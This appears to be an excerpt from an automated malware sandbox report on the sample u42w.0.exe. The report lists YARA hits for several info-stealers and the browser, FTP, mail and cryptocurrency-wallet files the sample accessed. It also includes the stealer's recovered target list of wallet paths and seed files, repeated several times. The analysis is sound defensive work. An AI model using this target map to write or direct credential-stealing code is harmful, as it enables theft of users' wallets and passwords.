Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sers\user\AppData\Roaming\\Electrum-LTC\wallets\\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA20C40 sqlite3_bind_zeroblob,	1_2_6CA20C40
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA20D60 sqlite3_bind_parameter_name,	1_2_6CA20D60
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C948EA0 sqlite3_clear_bindings,	1_2_6C948EA0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA20B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6CA20B40
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C946410 bind,WSAGetLastError,	1_2_6C946410
